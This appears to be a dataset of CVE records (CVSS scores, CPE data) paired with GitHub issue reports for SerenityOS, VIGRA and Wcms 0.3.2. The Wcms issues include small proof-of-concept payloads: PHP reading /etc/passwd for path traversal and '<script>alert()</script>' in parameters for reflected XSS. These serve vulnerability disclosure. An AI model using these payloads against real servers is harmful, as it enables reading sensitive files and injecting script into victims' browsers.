[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:serenityos:serenityos:2021-03-27:*:*:*:*:*:*:*", "matchCriteriaId": "418C100E-2C4B-4568-A8F6-E0122F20DB19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/SerenityOS/serenity/issues/5975
[ "Third Party Advisory" ]
github.com
[ "SerenityOS", "serenity" ]
Found with FuzzZip. File: [crash-a8b0cfbaa006f4fa95bdcf308ba014e7e95a59de.zip](https://github.com/SerenityOS/serenity/files/6215763/crash-a8b0cfbaa006f4fa95bdcf308ba014e7e95a59de.zip) Trace: ``` ================================================================= ==57861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300002c6c4 at pc 0x00000052a6aa bp 0x7ffd4de7fb50 sp 0x7ffd4de7f318 READ of size 18 at 0x60300002c6c4 thread T0 #0 0x52a6a9 in __asan_memcpy (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x52a6a9) #1 0x5645e5 in Archive::EndOfCentralDirectory::read(AK::Span<unsigned char const>) /home/lukew/Desktop/serenity-project/serenity/build/../Userland/Libraries/LibArchive/Zip.h:59:9 #2 0x5627a2 in Archive::Zip::try_create(AK::Span<unsigned char const> const&) /home/lukew/Desktop/serenity-project/serenity/build/../Userland/Libraries/LibArchive/Zip.cpp:54:35 #3 0x55d410 in LLVMFuzzerTestOneInput /home/lukew/Desktop/serenity-project/serenity/build/../Meta/Lagom/Fuzzers/FuzzZip.cpp:34:21 #4 0x4656f1 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x4656f1) #5 0x464e35 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x464e35) #6 0x4670d7 in fuzzer::Fuzzer::MutateAndTestOne() (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x4670d7) #7 0x467dd5 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x467dd5) #8 0x45678e in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x45678e) #9 0x47f5d2 in main (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x47f5d2) #10 0x7f1e543110b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x42b52d in _start (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x42b52d) 0x60300002c6c4 is located 0 bytes to the right of 20-byte region [0x60300002c6b0,0x60300002c6c4) allocated by thread T0 here: #0 0x52b25d in malloc (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x52b25d) #1 0x55f274 in AK::ByteBufferImpl::ByteBufferImpl(void const*, unsigned long) /home/lukew/Desktop/serenity-project/serenity/build/.././AK/ByteBuffer.h:284:35 #2 0x55ee3c in AK::ByteBufferImpl::copy(void const*, unsigned long) /home/lukew/Desktop/serenity-project/serenity/build/.././AK/ByteBuffer.h:328:25 #3 0x55da54 in AK::ByteBuffer::copy(void const*, unsigned long) /home/lukew/Desktop/serenity-project/serenity/build/.././AK/ByteBuffer.h:128:79 #4 0x55d3d8 in LLVMFuzzerTestOneInput /home/lukew/Desktop/serenity-project/serenity/build/../Meta/Lagom/Fuzzers/FuzzZip.cpp:33:27 #5 0x4656f1 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x4656f1) #6 0x464e35 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x464e35) #7 0x4670d7 in fuzzer::Fuzzer::MutateAndTestOne() (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x4670d7) #8 0x467dd5 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x467dd5) #9 0x45678e in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x45678e) #10 0x47f5d2 in main (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x47f5d2) #11 0x7f1e543110b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzZip+0x52a6a9) in __asan_memcpy Shadow bytes around the buggy address: 0x0c067fffd880: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c067fffd890: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fffd8a0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fffd8b0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c067fffd8c0: fd fa fa fa fd fd fd fa fa fa 00 00 04 fa fa fa =>0x0c067fffd8d0: 00 00 00 fa fa fa 00 00[04]fa fa fa fa fa fa fa 0x0c067fffd8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffd8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffd900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffd910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fffd920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==57861==ABORTING ```
LibArchive: Buffer overflow in EndOfCentralDirectory::read
https://api.github.com/repos/SerenityOS/serenity/issues/5975/comments
0
2021-03-27T13:56:01Z
2021-03-27T15:28:48Z
https://github.com/SerenityOS/serenity/issues/5975
842,509,408
5,975
1,796
CVE-2021-30046
2021-04-06T13:15:14.607
VIGRA Computer Vision Library Version-1-11-1 contains a segmentation fault vulnerability in the impex.hxx read_image_band() function, in which a crafted file can cause a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ukoethe/vigra/issues/494" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ukoethe/vigra/issues/494" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vigra_computer_vision_library_project:vigra_computer_vision_library:1.11.1:*:*:*:*:*:*:*", "matchCriteriaId": "3468C61E-3926-42E7-8C59-6382A8586583", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/ukoethe/vigra/issues/494
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ukoethe", "vigra" ]
Hello, Using hugin (2020.0.0) software verdandi adopting vigra, I encountered on the segmentation fault error. (http://hugin.sourceforge.net/releases/2020.0.0/en.shtml) The root cause is assumed to be from Illegal reference by `void vigra::StandardValueAccessor<unsigned short>::set<unsigned short, unsigned short*>(unsigned short, unsigned short*&).` of debian package > libvigraimpex-dev/focal,now 1.11.1+dfsg-7ubuntu1 The **set()** is assumed to be out-of-bound without any appropriate check of the valid address dereferenced by scanline. See _/include/vigra/impex.hxx:82-89_ lines; ``` const ImageRowIterator is_end(is + width); while (is != is_end) { image_accessor.set(*scanline, is); scanline += offset; ++is; } ++image_iterator.y; ``` The running command and backtrace is ``` oren@ubuntu:~$ sudo ./hugin-2020.0.0/build/src/tools/verdandi --output=1.tif ./poc Warning: no TIFFTAG_SAMPLEFORMAT or TIFFTAG_DATATYPE, guessing pixeltype 'UINT16'. Warning: no TIFFTAG_SAMPLEFORMAT or TIFFTAG_DATATYPE, guessing pixeltype 'UINT16'. LogLuvSetupDecode: Inappropriate photometric interpretation 32985 for SGILog compression; must be either LogLUV or LogL. ASAN:SIGSEGV ================================================================= ==100013==ERROR: AddressSanitizer: SEGV on unknown address 0x7fba4f4096f6 (pc 0x000000463ce6 bp 0x7fff40bb34e0 sp 0x7fff40bb33b0 T0) #0 0x463ce5 in void vigra::StandardValueAccessor<unsigned short>::set<unsigned short, unsigned short*>(unsigned short, unsigned short*&) const /usr/include/vigra/accessor.hxx:234 #1 0x463ce5 in void vigra::detail::read_image_band<unsigned short, vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short> >(vigra::Decoder*, vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short>) /usr/include/vigra/impex.hxx:86 #2 0x463ce5 in void vigra::detail::importImage<vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short> >(vigra::ImageImportInfo const&, vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short>, vigra::VigraTrueType) /usr/include/vigra/impex.hxx:212 #3 0x60ef6c in void vigra::importImage<vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short> >(vigra::ImageImportInfo const&, vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short>) /usr/include/vigra/impex.hxx:796 #4 0x60ef6c in void vigra::importImage<vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short> >(vigra::ImageImportInfo const&, std::pair<vigra::BasicImageIterator<unsigned short, unsigned short**>, vigra::StandardValueAccessor<unsigned short> >) /usr/include/vigra/impex.hxx:807 #5 0x60ef6c in bool ResaveImage<vigra::BasicImage<unsigned short, std::allocator<unsigned short> >, vigra::BasicImage<unsigned short, std::allocator<unsigned short> > >(vigra::ImageImportInfo const&, vigra::ImageExportInfo&) /home/oren/hugin-2020.0.0/src/tools/verdandi.cpp:213 #6 0x42154f in main /home/oren/hugin-2020.0.0/src/tools/verdandi.cpp:410 #7 0x7fba574c682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x424878 in _start (/home/oren/hugin-2020.0.0/build/src/tools/verdandi+0x424878) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /usr/include/vigra/accessor.hxx:234 void vigra::StandardValueAccessor<unsigned short>::set<unsigned short, unsigned short*>(unsigned short, unsigned short*&) const ==100013==ABORTING ``` [poc.txt](https://github.com/ukoethe/vigra/files/6235494/poc.txt) I attached the poc file on this post. Please kindly check the error. Best, Choongin Lee
Segmentation Fault error in read_image_band() of impex.hxx
https://api.github.com/repos/ukoethe/vigra/issues/494/comments
0
2021-03-31T09:32:15Z
2021-03-31T09:32:15Z
https://github.com/ukoethe/vigra/issues/494
846,285,894
494
1,797
CVE-2020-24136
2021-04-07T15:15:12.873
Directory traversal in Wcms 0.3.2 allows an attacker to read arbitrary files on the server that is running an application via the pagename parameter to wex/html.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24136.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24136.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/vedees/wcms/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "vedees", "wcms" ]
Hi, dev team! There is Path Traversal vulnerability in `wcms/wex/html.php` file. The vulnerable code is: wcms/wex/core/classes/Pagename.php:16: `$_SESSION['pagename'] = $_POST['pagename'];` wcms/wex/core/classes/Pagename.php:20: `$GLOBALS['pagename'] = $_SESSION['pagename'];` wcms/wex/html.php:17: `$html_from_template = htmlspecialchars(file_get_contents($GLOBALS['pagename']));` wcms/wex/html.php:51: `:code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'` Example POC: ``` <?php $pagename = "/etc/passwd"; $html_from_template = htmlspecialchars(file_get_contents($pagename)); echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES); ?> ``` A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: https://portswigger.net/web-security/file-path-traversal (prevent section) Please let me know about any fixes, I would like to register CVE number.
Path Traversal vulnerability in wcms/wex/html.php
https://api.github.com/repos/vedees/wcms/issues/12/comments
1
2020-07-20T15:25:18Z
2020-07-21T12:18:17Z
https://github.com/vedees/wcms/issues/12
661,950,692
12
1,798
CVE-2020-24138
2021-04-07T15:15:12.950
Cross Site Scripting (XSS) vulnerability in wcms 0.3.2 allows remote attackers to inject arbitrary web script and HTML via the pagename parameter to wex/html.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24138.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24138.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/vedees/wcms/issues/10
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "vedees", "wcms" ]
Hi, dev team! There is Reflected XSS vulnerability in `wcms/wex/html.php` file. The vulnerable code is: wcms/wex/core/classes/Pagename.php:16: `$_SESSION['pagename'] = $_POST['pagename'];` wcms/wex/core/classes/Pagename.php:20: `$GLOBALS['pagename'] = $_SESSION['pagename'];` wcms/wex/html.php:52: `path='<?php echo $GLOBALS['pagename']; ?>'` Example POC: Just send any js code in `pagename ` parameter like: `pagename =<script>alert()</script>` Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: https://portswigger.net/web-security/cross-site-scripting/preventing. Please let me know about any fixes, I would like to register CVE number.
Reflected XSS vulnerability in wcms/wex/html.php
https://api.github.com/repos/vedees/wcms/issues/10/comments
1
2020-07-20T15:19:07Z
2020-07-21T12:23:46Z
https://github.com/vedees/wcms/issues/10
661,944,133
10
1,799
CVE-2020-24135
2021-04-07T16:15:12.977
A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Wcms 0.3.2, which allows remote attackers to inject arbitrary web script and HTML via the type parameter to wex/cssjs.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24135.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24135.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/vedees/wcms/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "vedees", "wcms" ]
Hi, dev team! There is Reflected XSS vulnerability in `wcms/wcms/wex/cssjs.php` file. The vulnerable code is: 64: `type='<?php echo $_GET['type'];?>'>` Example POC: Just send any js code in `type` parameter like: `type=<script>alert()</script>` Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: https://portswigger.net/web-security/cross-site-scripting/preventing. Please let me know about any fixes, I would like to register CVE number.
Reflected XSS vulnerability in wcms/wcms/wex/cssjs.php
https://api.github.com/repos/vedees/wcms/issues/9/comments
0
2020-07-20T15:12:03Z
2020-07-20T15:23:12Z
https://github.com/vedees/wcms/issues/9
661,936,410
9
1,800
CVE-2020-24137
2021-04-07T16:15:13.057
Directory traversal vulnerability in Wcms 0.3.2 allows an attacker to read arbitrary files on the server that is running an application via the path parameter to wex/cssjs.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24137.md" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24137.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/vedees/wcms/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/vedees/wcms/issues/7
[ "Third Party Advisory" ]
github.com
[ "vedees", "wcms" ]
Hi, dev team! There is Path Traversal vulnerability in `wcms/wcms/wex/cssjs.php` file. The vulnerable code is: 31: `$path = $_GET['path'];` 32: `$html_from_template = htmlspecialchars(file_get_contents($path));` 61: `:code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'` Example POC: ``` <?php $path = "/etc/passwd"; $html_from_template = htmlspecialchars(file_get_contents($path)); echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES); ?> ``` A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: https://portswigger.net/web-security/file-path-traversal (prevent section) Please let me know about any fixes, I would like to register CVE number.
Path Traversal vulnerability in wcms/wcms/wex/cssjs.php
https://api.github.com/repos/vedees/wcms/issues/7/comments
1
2020-07-20T14:57:42Z
2020-07-23T21:11:50Z
https://github.com/vedees/wcms/issues/7
661,921,033
7
1,801
CVE-2020-24139
2021-04-07T16:15:13.103
Server-side request forgery in Wcms 0.3.2 lets an attacker send crafted requests from the back-end server of a vulnerable web application via the path parameter to wex/cssjs.php. It can help identify open ports, local network hosts and execute command on local services.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24139.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description" ], "url": "https://github.com/vedees/wcms/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/secwx/research/blob/main/cve/CVE-2020-24139.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description" ], "url": "https://github.com/vedees/wcms/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wcms:wcms:0.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "95CE7D1E-E919-449E-88D4-F6A0FCADFAF0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/vedees/wcms/issues/8
[ "Exploit", "Technical Description" ]
github.com
[ "vedees", "wcms" ]
